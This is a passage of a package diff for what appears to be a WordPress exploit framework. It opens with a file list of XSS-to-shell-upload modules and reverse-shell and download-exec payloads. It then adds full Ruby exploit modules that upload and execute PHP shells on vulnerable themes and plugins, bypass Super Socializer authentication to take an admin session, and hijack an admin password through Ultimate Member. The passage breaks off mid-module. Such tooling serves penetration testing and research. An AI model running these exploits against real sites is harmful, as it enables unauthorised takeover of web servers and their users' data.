- data/lib/wpxf/modules/exploit/xss/reflected/simple_slideshow_manager_reflected_xss_shell_upload.rb +39 -0
- data/lib/wpxf/modules/exploit/xss/reflected/slideshow_gallery_reflected_xss_shell_upload.rb +35 -0
- data/lib/wpxf/modules/exploit/xss/reflected/smart_marketing_xss_shell_upload.rb +37 -0
- data/lib/wpxf/modules/exploit/xss/reflected/social_buttons_pack_reflected_xss_shell_upload.rb +20 -0
- data/lib/wpxf/modules/exploit/xss/reflected/social_login_bws_reflected_xss_shell_upload.rb +20 -0
- data/lib/wpxf/modules/exploit/xss/reflected/social_pug_reflected_xss_shell_upload.rb +34 -0
- data/lib/wpxf/modules/exploit/xss/reflected/sp_project_document_manager_reflected_xss_shell_upload.rb +41 -0
- data/lib/wpxf/modules/exploit/xss/reflected/spamfree_reflected_xss_shell_upload.rb +44 -0
- data/lib/wpxf/modules/exploit/xss/reflected/spiffy_calendar_reflected_xss_shell_upload.rb +49 -0
- data/lib/wpxf/modules/exploit/xss/reflected/splashing_images_reflected_xss_shell_upload.rb +39 -0
- data/lib/wpxf/modules/exploit/xss/reflected/subscriber_reflected_xss_shell_upload.rb +20 -0
- data/lib/wpxf/modules/exploit/xss/reflected/tidio_gallery_reflected_xss_shell_upload.rb +34 -0
- data/lib/wpxf/modules/exploit/xss/reflected/timesheet_reflected_xss_shell_upload.rb +20 -0
- data/lib/wpxf/modules/exploit/xss/reflected/tracking_code_manager_reflected_xss_shell_upload.rb +34 -0
- data/lib/wpxf/modules/exploit/xss/reflected/tribulant_newsletter_reflected_xss_shell_upload.rb +39 -0
- data/lib/wpxf/modules/exploit/xss/reflected/tribulant_slideshow_gallery_reflected_xss_shell_upload.rb +34 -0
- data/lib/wpxf/modules/exploit/xss/reflected/trust_form_reflected_xss_shell_upload.rb +37 -0
- data/lib/wpxf/modules/exploit/xss/reflected/twitter_plugin_reflected_xss_shell_upload.rb +20 -0
- data/lib/wpxf/modules/exploit/xss/reflected/ultimate_csv_importer_reflected_xss_shell_upload.rb +83 -0
- data/lib/wpxf/modules/exploit/xss/reflected/ultimate_form_builder_lite_reflected_xss_shell_upload.rb +30 -0
- data/lib/wpxf/modules/exploit/xss/reflected/updater_reflected_xss_shell_upload.rb +20 -0
- data/lib/wpxf/modules/exploit/xss/reflected/user_access_manager_reflected_xss_shell_upload.rb +35 -0
- data/lib/wpxf/modules/exploit/xss/reflected/user_login_history_xss_shell_upload.rb +35 -0
- data/lib/wpxf/modules/exploit/xss/reflected/user_role_reflected_xss_shell_upload.rb +20 -0
- data/lib/wpxf/modules/exploit/xss/reflected/visitors_online_reflected_xss_shell_upload.rb +20 -0
- data/lib/wpxf/modules/exploit/xss/reflected/w3_total_cache_reflected_xss_shell_upload.rb +38 -0
- data/lib/wpxf/modules/exploit/xss/reflected/wang_guard_reflected_xss_shell_upload.rb +33 -0
- data/lib/wpxf/modules/exploit/xss/reflected/whizz_reflected_xss_shell_upload.rb +34 -0
- data/lib/wpxf/modules/exploit/xss/reflected/woo_email_control_reflected_xss_shell_upload.rb +41 -0
- data/lib/wpxf/modules/exploit/xss/reflected/wordpress_firewall_reflected_xss_shell_upload.rb +38 -0
- data/lib/wpxf/modules/exploit/xss/reflected/wp_advanced_importer_reflected_xss_shell_upload.rb +37 -0
- data/lib/wpxf/modules/exploit/xss/reflected/wp_filebase_download_manager_reflected_xss_shell_upload.rb +37 -0
- data/lib/wpxf/modules/exploit/xss/reflected/wp_live_chat_support_reflected_xss_shell_upload.rb +40 -0
- data/lib/wpxf/modules/exploit/xss/reflected/wp_mailster_reflected_xss_shell_upload.rb +38 -0
- data/lib/wpxf/modules/exploit/xss/reflected/wp_members_reflected_xss_shell_upload.rb +39 -0
- data/lib/wpxf/modules/exploit/xss/reflected/wp_retina_2x_xss_shell_upload.rb +39 -0
- data/lib/wpxf/modules/exploit/xss/reflected/wp_statistics_12.0.9_reflected_xss_shell_upload.rb +39 -0
- data/lib/wpxf/modules/exploit/xss/reflected/wp_statistics_reflected_xss_shell_upload.rb +38 -0
- data/lib/wpxf/modules/exploit/xss/reflected/wp_v4.4_xss_shell_upload.rb +54 -0
- data/lib/wpxf/modules/exploit/xss/reflected/wp_whois_domain_reflected_xss_shell_upload.rb +41 -0
- data/lib/wpxf/modules/exploit/xss/reflected/wpsolr_reflected_xss_shell_upload.rb +34 -0
- data/lib/wpxf/modules/exploit/xss/reflected/yoast_seo_xss_shell_upload.rb +34 -0
- data/lib/wpxf/modules/exploit/xss/reflected/zurl_preview_xss_shell_upload.rb +38 -0
- data/lib/wpxf/modules/exploit/xss/stored/admin_management_xtended_xss_shell_upload.rb +172 -0
- data/lib/wpxf/modules/exploit/xss/stored/all_in_one_seo_pack_xss_shell_upload.rb +208 -0
- data/lib/wpxf/modules/exploit/xss/stored/alo_easymail_csrf_xss_shell_upload.rb +48 -0
- data/lib/wpxf/modules/exploit/xss/stored/appointment_schedule_booking_system_stored_xss_shell_upload.rb +41 -0
- data/lib/wpxf/modules/exploit/xss/stored/arabic_font_csrf_stored_xss_shell_upload.rb +39 -0
- data/lib/wpxf/modules/exploit/xss/stored/caldera_forms_stored_xss_shell_upload.rb +38 -0
- data/lib/wpxf/modules/exploit/xss/stored/content_audit_csrf_stored_xss_shell_upload.rb +83 -0
- data/lib/wpxf/modules/exploit/xss/stored/dw_question_answer_stored_xss_shell_upload.rb +91 -0
- data/lib/wpxf/modules/exploit/xss/stored/dwnldr_xss_shell_upload.rb +58 -0
- data/lib/wpxf/modules/exploit/xss/stored/embed_comment_images_stored_xss_shell_upload.rb +57 -0
- data/lib/wpxf/modules/exploit/xss/stored/flickr_rss_csrf_xss_shell_upload.rb +38 -0
- data/lib/wpxf/modules/exploit/xss/stored/four04_to_three01_stored_xss_shell_upload.rb +50 -0
- data/lib/wpxf/modules/exploit/xss/stored/gwolle_guestbook_stored_xss_shell_upload.rb +47 -0
- data/lib/wpxf/modules/exploit/xss/stored/imageinject_csrf_xss_shell_upload.rb +53 -0
- data/lib/wpxf/modules/exploit/xss/stored/instagram_feed_csrf_stored_xss_shell_upload.rb +51 -0
- data/lib/wpxf/modules/exploit/xss/stored/ithemes_security_stored_xss_shell_upload.rb +40 -0
- data/lib/wpxf/modules/exploit/xss/stored/ithemes_security_v6.9.0_stored_xss_shell_upload.rb +40 -0
- data/lib/wpxf/modules/exploit/xss/stored/mdc_private_message_xss_shell_upload.rb +118 -0
- data/lib/wpxf/modules/exploit/xss/stored/newsletter_by_supsystic_csrf_stored_xss_shell_upload.rb +43 -0
- data/lib/wpxf/modules/exploit/xss/stored/participants_database_v1.7.5.9_stored_xss_shell_upload.rb +80 -0
- data/lib/wpxf/modules/exploit/xss/stored/safe_editor_xss_shell_upload.rb +60 -0
- data/lib/wpxf/modules/exploit/xss/stored/smart_google_code_inserter_xss_shell_upload.rb +39 -0
- data/lib/wpxf/modules/exploit/xss/stored/social_media_widget_csrf_xss_shell_upload.rb +39 -0
- data/lib/wpxf/modules/exploit/xss/stored/srbtranslatin_csrf_xss_shell_upload.rb +42 -0
- data/lib/wpxf/modules/exploit/xss/stored/ultimate_addons_for_vc_authenticated_stored_xss_shell_upload.rb +48 -0
- data/lib/wpxf/modules/exploit/xss/stored/ultimate_addons_for_vc_reflected_stored_xss_shell_upload.rb +37 -0
- data/lib/wpxf/modules/exploit/xss/stored/universal_analytics_authenticated_xss_shell_upload.rb +90 -0
- data/lib/wpxf/modules/exploit/xss/stored/user_login_log_authenticated_stored_xss_shell_upload.rb +45 -0
- data/lib/wpxf/modules/exploit/xss/stored/woo_custom_checkout_field_xss_shell_upload.rb +44 -0
- data/lib/wpxf/modules/exploit/xss/stored/wp_google_maps_stored_xss_shell_upload.rb +55 -0
- data/lib/wpxf/modules/exploit/xss/stored/wp_live_chat_support_stored_xss_shell_upload.rb +99 -0
- data/lib/wpxf/modules/exploit/xss/stored/wp_piwik_stored_xss_shell_upload.rb +36 -0
- data/lib/wpxf/modules/exploit/xss/stored/wp_v4.3_shortcode_xss_shell_upload.rb +55 -0
- data/lib/wpxf/net.rb +16 -0
- data/lib/wpxf/net/cookie_jar.rb +37 -0
- data/lib/wpxf/net/http_client.rb +206 -0
- data/lib/wpxf/net/http_options.rb +98 -0
- data/lib/wpxf/net/http_response.rb +44 -0
- data/lib/wpxf/net/http_server.rb +186 -0
- data/lib/wpxf/net/typhoeus_helper.rb +46 -0
- data/lib/wpxf/net/user_agent.rb +193 -0
- data/lib/wpxf/payloads/bind_php.rb +95 -0
- data/lib/wpxf/payloads/custom.rb +42 -0
- data/lib/wpxf/payloads/download_exec.rb +43 -0
- data/lib/wpxf/payloads/exec.rb +43 -0
- data/lib/wpxf/payloads/meterpreter_bind_tcp.rb +64 -0
- data/lib/wpxf/payloads/meterpreter_reverse_tcp.rb +50 -0
- data/lib/wpxf/payloads/reverse_tcp.rb +152 -0
- data/lib/wpxf/payloads/socket_helper.rb +50 -0
- data/lib/wpxf/utility.rb +12 -0
- data/lib/wpxf/utility/body_builder.rb +151 -0
- data/lib/wpxf/utility/reference_inflater.rb +34 -0
- data/lib/wpxf/utility/text.rb +81 -0
- data/lib/wpxf/versioning.rb +11 -0
- data/lib/wpxf/versioning/browser_versions.rb +56 -0
- data/lib/wpxf/versioning/os_versions.rb +18 -0
- data/lib/wpxf/wordpress.rb +24 -0
- data/lib/wpxf/wordpress/comments.rb +89 -0
- data/lib/wpxf/wordpress/file_download.rb +168 -0
- data/lib/wpxf/wordpress/fingerprint.rb +238 -0
- data/lib/wpxf/wordpress/hash_dump.rb +264 -0
- data/lib/wpxf/wordpress/login.rb +60 -0
- data/lib/wpxf/wordpress/options.rb +27 -0
- data/lib/wpxf/wordpress/plugin.rb +102 -0
- data/lib/wpxf/wordpress/posts.rb +26 -0
- data/lib/wpxf/wordpress/reflected_xss.rb +40 -0
- data/lib/wpxf/wordpress/shell_upload.rb +172 -0
- data/lib/wpxf/wordpress/staged_reflected_xss.rb +82 -0
- data/lib/wpxf/wordpress/stored_xss.rb +73 -0
- data/lib/wpxf/wordpress/urls.rb +131 -0
- data/lib/wpxf/wordpress/user.rb +35 -0
- data/lib/wpxf/wordpress/xss.rb +143 -0
- data/wpxf.gemspec +33 -0
- metadata +708 -0
|
@@ -0,0 +1,15 @@
|
|
|
1
|
+
# frozen_string_literal: true
|
|
2
|
+
|
|
3
|
+
class Wpxf::Exploit::ShowbizRevsliderShellUpload < Wpxf::Exploit::RevsliderShellUpload
|
|
4
|
+
def initialize
|
|
5
|
+
super
|
|
6
|
+
|
|
7
|
+
update_info(
|
|
8
|
+
name: 'Showbiz Theme RevSlider <= 3.0.95 Shell Upload',
|
|
9
|
+
desc: 'This module exploits a file upload vulnerability in versions of '\
|
|
10
|
+
'the Showbiz theme that include versions <= 3.0.95 of the '\
|
|
11
|
+
'RevSlider plugin which allows unauthenticated users to upload '\
|
|
12
|
+
'and execute PHP scripts in the context of the web server.'
|
|
13
|
+
)
|
|
14
|
+
end
|
|
15
|
+
end
|
|
@@ -0,0 +1,91 @@
|
|
|
1
|
+
# frozen_string_literal: true
|
|
2
|
+
|
|
3
|
+
require 'socket'
|
|
4
|
+
|
|
5
|
+
class Wpxf::Exploit::SimplecartShellUpload < Wpxf::Module
|
|
6
|
+
include Wpxf
|
|
7
|
+
|
|
8
|
+
def initialize
|
|
9
|
+
super
|
|
10
|
+
|
|
11
|
+
update_info(
|
|
12
|
+
name: 'Simplecart Theme Shell Upload',
|
|
13
|
+
desc: 'This module exploits a file upload vulnerability in all versions '\
|
|
14
|
+
'of the Simplecart theme found in the upload_file.php script '\
|
|
15
|
+
'which contains no session or file validation. It allows '\
|
|
16
|
+
'unauthenticated users to upload files of any type and '\
|
|
17
|
+
'subsequently execute PHP scripts in the context of the '\
|
|
18
|
+
'web server.',
|
|
19
|
+
author: [
|
|
20
|
+
'Divya', # Vulnerability disclosure
|
|
21
|
+
'rastating' # WPXF module
|
|
22
|
+
],
|
|
23
|
+
references: [
|
|
24
|
+
['EDB', '36611']
|
|
25
|
+
],
|
|
26
|
+
date: 'April 02 2015'
|
|
27
|
+
)
|
|
28
|
+
end
|
|
29
|
+
|
|
30
|
+
def check
|
|
31
|
+
check_theme_version_from_readme('simplecart')
|
|
32
|
+
end
|
|
33
|
+
|
|
34
|
+
def plugin_url
|
|
35
|
+
normalize_uri(wordpress_url_themes, 'simplecart')
|
|
36
|
+
end
|
|
37
|
+
|
|
38
|
+
def uploads_url
|
|
39
|
+
normalize_uri(plugin_url, 'admin',)
|
|
40
|
+
end
|
|
41
|
+
|
|
42
|
+
def uploader_url
|
|
43
|
+
normalize_uri(uploads_url, 'upload-file.php')
|
|
44
|
+
end
|
|
45
|
+
|
|
46
|
+
def payload_body_builder(payload_name)
|
|
47
|
+
target_ip = IPSocket.getaddress(target_host)
|
|
48
|
+
field_name = Utility::Text.md5(target_ip)
|
|
49
|
+
|
|
50
|
+
builder = Utility::BodyBuilder.new
|
|
51
|
+
builder.add_file_from_string(field_name, payload.encoded, payload_name)
|
|
52
|
+
builder.add_field('upload_path', 'Lg==')
|
|
53
|
+
builder
|
|
54
|
+
end
|
|
55
|
+
|
|
56
|
+
def run
|
|
57
|
+
return false unless super
|
|
58
|
+
|
|
59
|
+
emit_info 'Preparing payload...'
|
|
60
|
+
payload_name = "#{Utility::Text.rand_alpha(10, :lower)}.php"
|
|
61
|
+
builder = payload_body_builder(payload_name)
|
|
62
|
+
|
|
63
|
+
emit_info 'Uploading payload...'
|
|
64
|
+
res = nil
|
|
65
|
+
builder.create do |body|
|
|
66
|
+
res = execute_post_request(url: uploader_url, body: body)
|
|
67
|
+
end
|
|
68
|
+
|
|
69
|
+
if res.nil?
|
|
70
|
+
emit_error 'No response from the target'
|
|
71
|
+
return false
|
|
72
|
+
end
|
|
73
|
+
|
|
74
|
+
if res.code != 200
|
|
75
|
+
emit_error "Server responded with code #{res.code}"
|
|
76
|
+
return false
|
|
77
|
+
end
|
|
78
|
+
|
|
79
|
+
payload_url = normalize_uri(uploads_url, payload_name)
|
|
80
|
+
emit_success "Uploaded the payload to #{payload_url}", true
|
|
81
|
+
|
|
82
|
+
emit_info 'Executing the payload...'
|
|
83
|
+
res = execute_get_request(url: payload_url)
|
|
84
|
+
|
|
85
|
+
if res && res.code == 200 && !res.body.strip.empty?
|
|
86
|
+
emit_success "Result: #{res.body}"
|
|
87
|
+
end
|
|
88
|
+
|
|
89
|
+
return true
|
|
90
|
+
end
|
|
91
|
+
end
|
|
@@ -0,0 +1,15 @@
|
|
|
1
|
+
# frozen_string_literal: true
|
|
2
|
+
|
|
3
|
+
class Wpxf::Exploit::SoulmedicRevsliderShellUpload < Wpxf::Exploit::RevsliderShellUpload
|
|
4
|
+
def initialize
|
|
5
|
+
super
|
|
6
|
+
|
|
7
|
+
update_info(
|
|
8
|
+
name: 'Soulmedic Theme RevSlider <= 3.0.95 Shell Upload',
|
|
9
|
+
desc: 'This module exploits a file upload vulnerability in versions of '\
|
|
10
|
+
'the Soulmedic theme that include versions <= 3.0.95 of the '\
|
|
11
|
+
'RevSlider plugin which allows unauthenticated users to upload '\
|
|
12
|
+
'and execute PHP scripts in the context of the web server.'
|
|
13
|
+
)
|
|
14
|
+
end
|
|
15
|
+
end
|
|
@@ -0,0 +1,15 @@
|
|
|
1
|
+
# frozen_string_literal: true
|
|
2
|
+
|
|
3
|
+
class Wpxf::Exploit::StrikingRRevsliderShellUpload < Wpxf::Exploit::RevsliderShellUpload
|
|
4
|
+
def initialize
|
|
5
|
+
super
|
|
6
|
+
|
|
7
|
+
update_info(
|
|
8
|
+
name: 'Striking-R Theme RevSlider <= 3.0.95 Shell Upload',
|
|
9
|
+
desc: 'This module exploits a file upload vulnerability in versions of '\
|
|
10
|
+
'the Striking R theme that include versions <= 3.0.95 of the '\
|
|
11
|
+
'RevSlider plugin which allows unauthenticated users to upload '\
|
|
12
|
+
'and execute PHP scripts in the context of the web server.'
|
|
13
|
+
)
|
|
14
|
+
end
|
|
15
|
+
end
|
|
@@ -0,0 +1,110 @@
|
|
|
1
|
+
# frozen_string_literal: true
|
|
2
|
+
|
|
3
|
+
class Wpxf::Exploit::SuperSocializerShellUpload < Wpxf::Module
|
|
4
|
+
include Wpxf
|
|
5
|
+
include Wpxf::Net::HttpClient
|
|
6
|
+
include Wpxf::WordPress::Plugin
|
|
7
|
+
include Wpxf::WordPress::Login
|
|
8
|
+
|
|
9
|
+
def initialize
|
|
10
|
+
super
|
|
11
|
+
|
|
12
|
+
update_info(
|
|
13
|
+
name: 'Super Socializer <= 7.10.6 Authentication Bypass',
|
|
14
|
+
desc: %(
|
|
15
|
+
Super Socializer <= 7.10.6 is vulnerable to an
|
|
16
|
+
authentication bypass exploit if an attacker is
|
|
17
|
+
in posession of an admin's e-mail address and the
|
|
18
|
+
social login feature is enabled.
|
|
19
|
+
|
|
20
|
+
This module will acquire an admin session by utilising
|
|
21
|
+
the aforementioned vulnerability and upload a shell
|
|
22
|
+
packaged as a WordPress plugin.
|
|
23
|
+
),
|
|
24
|
+
author: [
|
|
25
|
+
'rastating' # WPXF module
|
|
26
|
+
],
|
|
27
|
+
references: [
|
|
28
|
+
['WPVDB', '9043']
|
|
29
|
+
],
|
|
30
|
+
date: 'Mar 03 2018'
|
|
31
|
+
)
|
|
32
|
+
|
|
33
|
+
register_options([
|
|
34
|
+
StringOption.new(
|
|
35
|
+
name: 'admin_email',
|
|
36
|
+
desc: 'The e-mail address of the admin user to authenticate as',
|
|
37
|
+
required: true
|
|
38
|
+
)
|
|
39
|
+
])
|
|
40
|
+
end
|
|
41
|
+
|
|
42
|
+
def check
|
|
43
|
+
check_plugin_version_from_readme('super-socializer', '7.10.7')
|
|
44
|
+
end
|
|
45
|
+
|
|
46
|
+
def fetch_nonce
|
|
47
|
+
emit_info 'Fetching a login nonce...'
|
|
48
|
+
res = execute_get_request(url: wordpress_url_login)
|
|
49
|
+
return false unless res&.code == 200
|
|
50
|
+
|
|
51
|
+
pattern = /var\sthe_champ_sl_ajax_token\s=\s{"ajax_url":".+?","security":"([a-z0-9]+?)"};/i
|
|
52
|
+
self.login_nonce = res.body[pattern, 1]
|
|
53
|
+
|
|
54
|
+
if login_nonce.nil?
|
|
55
|
+
emit_error 'Failed to fetch a login nonce'
|
|
56
|
+
return false
|
|
57
|
+
else
|
|
58
|
+
emit_success "Found nonce: #{login_nonce}", true
|
|
59
|
+
return true
|
|
60
|
+
end
|
|
61
|
+
end
|
|
62
|
+
|
|
63
|
+
def login
|
|
64
|
+
res = execute_post_request(
|
|
65
|
+
url: wordpress_url_admin_ajax,
|
|
66
|
+
body: {
|
|
67
|
+
'action' => 'the_champ_user_auth',
|
|
68
|
+
'security' => login_nonce,
|
|
69
|
+
'profileData[id]' => Wpxf::Utility::Text.rand_alpha(6),
|
|
70
|
+
'profileData[link]' => Wpxf::Utility::Text.rand_alpha(6),
|
|
71
|
+
'profileData[name]' => Wpxf::Utility::Text.rand_alpha(6),
|
|
72
|
+
'profileData[email]' => datastore['admin_email'],
|
|
73
|
+
'profileData[first_name]' => Wpxf::Utility::Text.rand_alpha(6),
|
|
74
|
+
'profileData[last_name]' => Wpxf::Utility::Text.rand_alpha(6),
|
|
75
|
+
'provider' => 'facebook',
|
|
76
|
+
'redirectionUrl' => full_uri
|
|
77
|
+
}
|
|
78
|
+
)
|
|
79
|
+
|
|
80
|
+
return false unless res&.cookies
|
|
81
|
+
|
|
82
|
+
if valid_wordpress_cookie?(res.cookies.to_s)
|
|
83
|
+
self.session_cookie = res.cookies.to_s
|
|
84
|
+
return res.cookies
|
|
85
|
+
else
|
|
86
|
+
emit_error 'Failed to authenticate'
|
|
87
|
+
return false
|
|
88
|
+
end
|
|
89
|
+
end
|
|
90
|
+
|
|
91
|
+
def run
|
|
92
|
+
return false unless super
|
|
93
|
+
return false unless fetch_nonce
|
|
94
|
+
|
|
95
|
+
emit_info "Authenticating as #{datastore['admin_email']}..."
|
|
96
|
+
return false unless login
|
|
97
|
+
|
|
98
|
+
emit_info 'Uploading payload...'
|
|
99
|
+
res = upload_payload_as_plugin_and_execute(
|
|
100
|
+
Utility::Text.rand_alpha(10),
|
|
101
|
+
Utility::Text.rand_alpha(10),
|
|
102
|
+
session_cookie
|
|
103
|
+
)
|
|
104
|
+
|
|
105
|
+
!res.nil?
|
|
106
|
+
end
|
|
107
|
+
|
|
108
|
+
attr_accessor :session_cookie
|
|
109
|
+
attr_accessor :login_nonce
|
|
110
|
+
end
|
|
@@ -0,0 +1,85 @@
|
|
|
1
|
+
# frozen_string_literal: true
|
|
2
|
+
|
|
3
|
+
class Wpxf::Exploit::SymposiumShellUpload < Wpxf::Module
|
|
4
|
+
include Wpxf
|
|
5
|
+
include Wpxf::Net::HttpClient
|
|
6
|
+
|
|
7
|
+
def initialize
|
|
8
|
+
super
|
|
9
|
+
|
|
10
|
+
update_info(
|
|
11
|
+
name: 'WP Symposium 14.11 Unrestricted File Upload',
|
|
12
|
+
desc: 'WP Symposium Plugin for WordPress contains a flaw that allows a '\
|
|
13
|
+
'remote attacker to execute arbitrary PHP code. This flaw exists '\
|
|
14
|
+
'because the /wp-symposium/server/file_upload_form.php script '\
|
|
15
|
+
'does not properly verify or sanitize user-uploaded files. By '\
|
|
16
|
+
'uploading a .php file, the remote system will place the file in '\
|
|
17
|
+
'a user-accessible path. Making a direct request to the uploaded '\
|
|
18
|
+
'file will allow the attacker to execute the script with the '\
|
|
19
|
+
'privileges of the web server.',
|
|
20
|
+
author: [
|
|
21
|
+
'Claudio Viviani', # Vulnerability disclosure
|
|
22
|
+
'rastating' # WPXF module
|
|
23
|
+
],
|
|
24
|
+
references: [
|
|
25
|
+
['WPVDB', '7716']
|
|
26
|
+
],
|
|
27
|
+
date: 'Dec 11 2014'
|
|
28
|
+
)
|
|
29
|
+
end
|
|
30
|
+
|
|
31
|
+
def check
|
|
32
|
+
check_plugin_version_from_readme('wp-symposium', '14.12')
|
|
33
|
+
end
|
|
34
|
+
|
|
35
|
+
def symposium_url
|
|
36
|
+
normalize_uri(wordpress_url_plugins, 'wp-symposium', 'server', 'php')
|
|
37
|
+
end
|
|
38
|
+
|
|
39
|
+
def successful_upload(res)
|
|
40
|
+
res && res.code == 200 && res.body.length > 0 &&
|
|
41
|
+
!res.body.include?('error') && !res.body.eql?('0')
|
|
42
|
+
end
|
|
43
|
+
|
|
44
|
+
def payload_body_builder(payload_name, directory_name)
|
|
45
|
+
builder = Utility::BodyBuilder.new
|
|
46
|
+
builder.add_field('uploader_uid', '1')
|
|
47
|
+
builder.add_field('uploader_dir', "./#{directory_name}/")
|
|
48
|
+
builder.add_field('uploader_url', symposium_url.sub(base_uri, ''))
|
|
49
|
+
builder.add_file_from_string('files[]', payload.encoded, payload_name)
|
|
50
|
+
builder
|
|
51
|
+
end
|
|
52
|
+
|
|
53
|
+
def run
|
|
54
|
+
return false unless super
|
|
55
|
+
|
|
56
|
+
emit_info 'Preparing payload...'
|
|
57
|
+
payload_id = Utility::Text.rand_alpha(10)
|
|
58
|
+
payload_file = "#{payload_id}.php"
|
|
59
|
+
payload_url = normalize_uri(symposium_url, payload_id, payload_file)
|
|
60
|
+
builder = payload_body_builder(payload_file, payload_id)
|
|
61
|
+
|
|
62
|
+
emit_info 'Uploading the payload...'
|
|
63
|
+
res = nil
|
|
64
|
+
builder.create do |body|
|
|
65
|
+
res = execute_post_request(url: normalize_uri(symposium_url, 'index.php'), body: body)
|
|
66
|
+
end
|
|
67
|
+
|
|
68
|
+
if successful_upload(res)
|
|
69
|
+
emit_success "Uploaded the payload to #{payload_url}", true
|
|
70
|
+
emit_info 'Executing the payload...'
|
|
71
|
+
res = execute_get_request(url: payload_url)
|
|
72
|
+
|
|
73
|
+
if res && res.code == 200 && !res.body.strip.empty?
|
|
74
|
+
emit_success "Result: #{res.body}"
|
|
75
|
+
end
|
|
76
|
+
|
|
77
|
+
return true
|
|
78
|
+
else
|
|
79
|
+
emit_error "HTTP status: #{res.code}", true
|
|
80
|
+
emit_error "Server returned: #{res.body}", true
|
|
81
|
+
emit_error 'Failed to upload the payload'
|
|
82
|
+
return false
|
|
83
|
+
end
|
|
84
|
+
end
|
|
85
|
+
end
|
|
@@ -0,0 +1,50 @@
|
|
|
1
|
+
# frozen_string_literal: true
|
|
2
|
+
|
|
3
|
+
class Wpxf::Exploit::TevolutionShellUpload < Wpxf::Module
|
|
4
|
+
include Wpxf::WordPress::ShellUpload
|
|
5
|
+
|
|
6
|
+
def initialize
|
|
7
|
+
super
|
|
8
|
+
|
|
9
|
+
update_info(
|
|
10
|
+
name: 'Tevolution < 2.3.0 Shell Upload',
|
|
11
|
+
author: [
|
|
12
|
+
'rastating' # WPXF module
|
|
13
|
+
],
|
|
14
|
+
references: [
|
|
15
|
+
['WPVDB', '8482'],
|
|
16
|
+
['URL', 'https://templatic.com/news/security-vulnerability-found-themes/']
|
|
17
|
+
],
|
|
18
|
+
date: 'Apr 23 2016'
|
|
19
|
+
)
|
|
20
|
+
end
|
|
21
|
+
|
|
22
|
+
def check
|
|
23
|
+
change_log = normalize_uri(plugin_url, 'change_log.txt')
|
|
24
|
+
check_version_from_custom_file(change_log, /\(Version\s(\d\.\d\.\d)\)/, '2.3.0')
|
|
25
|
+
end
|
|
26
|
+
|
|
27
|
+
def plugin_url
|
|
28
|
+
normalize_uri(wordpress_url_plugins, 'Tevolution')
|
|
29
|
+
end
|
|
30
|
+
|
|
31
|
+
def uploader_url
|
|
32
|
+
normalize_uri(plugin_url, 'tmplconnector', 'monetize', 'templatic-custom_fields', 'single-upload.php')
|
|
33
|
+
end
|
|
34
|
+
|
|
35
|
+
def payload_body_builder
|
|
36
|
+
builder = Utility::BodyBuilder.new
|
|
37
|
+
builder.add_file_from_string(Utility::Text.rand_alpha(5), payload.encoded, payload_name)
|
|
38
|
+
builder
|
|
39
|
+
end
|
|
40
|
+
|
|
41
|
+
def scrape_current_theme
|
|
42
|
+
res = execute_get_request(url: full_uri)
|
|
43
|
+
res.body[/\/#{wp_content_dir}\/themes\/(.*?)\//, 1] if res && res.body
|
|
44
|
+
end
|
|
45
|
+
|
|
46
|
+
def uploaded_payload_location
|
|
47
|
+
theme = scrape_current_theme
|
|
48
|
+
normalize_uri(wordpress_url_themes, theme, 'images', 'tmp', payload_name)
|
|
49
|
+
end
|
|
50
|
+
end
|
|
@@ -0,0 +1,132 @@
|
|
|
1
|
+
# frozen_string_literal: true
|
|
2
|
+
|
|
3
|
+
class Wpxf::Exploit::UltimateMemberShellUpload < Wpxf::Module
|
|
4
|
+
include Wpxf
|
|
5
|
+
include Wpxf::Net::HttpClient
|
|
6
|
+
include Wpxf::WordPress::Login
|
|
7
|
+
include Wpxf::WordPress::Plugin
|
|
8
|
+
|
|
9
|
+
def initialize
|
|
10
|
+
super
|
|
11
|
+
|
|
12
|
+
update_info(
|
|
13
|
+
name: 'Ultimate Member <= 1.3.75 Shell Upload',
|
|
14
|
+
desc: 'This module exploits a vulnerability that allows users of any level to change '\
|
|
15
|
+
'the password of any user. The module requires you login with an account of any '\
|
|
16
|
+
'level, which will then be used to change the specified admin users\' password. '\
|
|
17
|
+
'The compromised admin account will then be used to store and execute the payload.',
|
|
18
|
+
author: [
|
|
19
|
+
'James Golovich', # Discovery and disclosure
|
|
20
|
+
'rastating' # WPXF module
|
|
21
|
+
],
|
|
22
|
+
references: [
|
|
23
|
+
['WPVDB', '8688'],
|
|
24
|
+
['URL', 'https://ultimatemember.com/security-release-v1-3-76/']
|
|
25
|
+
],
|
|
26
|
+
date: 'Dec 08 2016'
|
|
27
|
+
)
|
|
28
|
+
|
|
29
|
+
register_options([
|
|
30
|
+
StringOption.new(
|
|
31
|
+
name: 'password_form_path',
|
|
32
|
+
desc: 'The path of the change password form (default is /account/password/)',
|
|
33
|
+
required: true
|
|
34
|
+
),
|
|
35
|
+
IntegerOption.new(
|
|
36
|
+
name: 'admin_user_id',
|
|
37
|
+
desc: 'The ID of the user to hijack the account of',
|
|
38
|
+
required: true
|
|
39
|
+
),
|
|
40
|
+
StringOption.new(
|
|
41
|
+
name: 'admin_username',
|
|
42
|
+
desc: 'The username of the admin user to hijack the account of',
|
|
43
|
+
required: true
|
|
44
|
+
)
|
|
45
|
+
])
|
|
46
|
+
end
|
|
47
|
+
|
|
48
|
+
def check
|
|
49
|
+
check_plugin_version_from_readme('ultimate-member', '1.3.76')
|
|
50
|
+
end
|
|
51
|
+
|
|
52
|
+
def requires_authentication
|
|
53
|
+
true
|
|
54
|
+
end
|
|
55
|
+
|
|
56
|
+
def password_form_url
|
|
57
|
+
normalize_uri(full_uri, datastore['password_form_path'])
|
|
58
|
+
end
|
|
59
|
+
|
|
60
|
+
def admin_user_id
|
|
61
|
+
normalized_option_value('admin_user_id')
|
|
62
|
+
end
|
|
63
|
+
|
|
64
|
+
def admin_username
|
|
65
|
+
normalized_option_value('admin_username')
|
|
66
|
+
end
|
|
67
|
+
|
|
68
|
+
def new_password
|
|
69
|
+
@new_password || @new_password = Utility::Text.rand_alphanumeric(3) +
|
|
70
|
+
Utility::Text.rand_alpha(1, :lower) +
|
|
71
|
+
Utility::Text.rand_numeric(2) +
|
|
72
|
+
Utility::Text.rand_alpha(1, :upper) +
|
|
73
|
+
Utility::Text.rand_alphanumeric(3)
|
|
74
|
+
end
|
|
75
|
+
|
|
76
|
+
def execute_password_change
|
|
77
|
+
execute_post_request(
|
|
78
|
+
url: password_form_url,
|
|
79
|
+
cookie: session_cookie,
|
|
80
|
+
body: {
|
|
81
|
+
'_um_password_change' => '1',
|
|
82
|
+
'timestamp' => Utility::Text.rand_numeric(3),
|
|
83
|
+
'user_password' => new_password,
|
|
84
|
+
'confirm_user_password' => new_password,
|
|
85
|
+
